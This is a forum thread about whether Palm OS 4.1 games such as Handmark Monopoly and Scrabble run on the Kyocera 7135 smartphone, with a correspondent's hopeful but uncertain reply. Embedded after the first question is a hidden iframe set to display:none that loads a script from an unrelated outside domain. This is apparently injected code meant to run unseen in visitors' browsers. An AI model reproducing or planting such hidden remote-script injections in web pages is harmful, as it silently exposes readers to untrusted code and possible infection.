+ Reply to Thread

Handmark Monopoly & Scrabble

will both of these games work on the 7135? Should all applications that are compatible with palm os 4.1 work with the 7135, or only some of them?

Also...which current PDA model is most similar to the 7135?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mod-Blog's SmartPhone Correspondent

Re: Handmark Monopoly & Scrabble

Originally posted by ari1979 will both of these games work on the 7135? Should all applications that are compatible with palm os 4.1 work with the 7135, or only some of them?
    Also...which current PDA model is most similar to the 7135?
    Good questions all and I think the answer at the moment is... "We don't know." Aside from the few lucky Alpha and Beta testers on the forum, no one has actually used a 7135 yet. Like the 6035, it makes a lot of assumptions and close links between the phone and the PDA, so there will be unexpected incompatibilities (like the "large font" issue in the TODAY application on the 6035). And as to which PDA is most like the 7135... I doubt there really is a good comparison. The 6035 was basically a Palm IIIxe, but the 7135 does not tightly adhere to any of the existing new models - everyone has done too good of a job differentiating themselves with unique features.

I'd say 90% of the normal Palm apps will work fine with the 7135, as a conservative estimate. Chances are the games you mention will work just fine - they are commercial games which use the general Palm API rather than hacks. But the proof is in the pudding, as they say, and until someone installs these onto a 7135, we will not know for sure.

I had Monopoly for a while, but didn't register it when the trial period ended. I WILL buy it to use in color on the 7135 though!

I wonder when we'll start seeing online gaming with the 7135? Wouldn't it be sweet to be able to play games against other people live on the 7135? (of course you'll want to have unlimited data for that... unless they can make the packets really small).
    Please visit my picture site: Robert-O-Rama :)